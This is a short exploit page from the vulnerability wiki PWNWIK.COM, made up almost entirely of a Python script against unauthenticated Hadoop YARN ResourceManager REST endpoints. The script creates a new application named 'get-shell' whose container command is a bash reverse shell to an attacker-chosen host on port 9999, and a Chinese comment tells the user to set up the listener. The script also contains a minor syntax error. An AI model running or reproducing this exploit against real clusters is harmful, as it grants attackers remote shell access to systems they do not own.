PWNWIK.COM
,
EXP
#!/usr/bin/env python
import requests
target = 'http://x.x.x.x:8088/'
lhost = 'x.x.x.x' #把本地主机ip放在这里,在9999端口监听(使用时删除注释)
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()'application-id'
url = target + 'ws/v1/cluster/apps'
data = {
'application-id': app_id,
'application-name': 'get-shell',
'am-container-spec': {
'commands': {
'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
requests.post(url, json=data)
PWNWIK.COM==免费、自由、人人可编辑的漏洞库
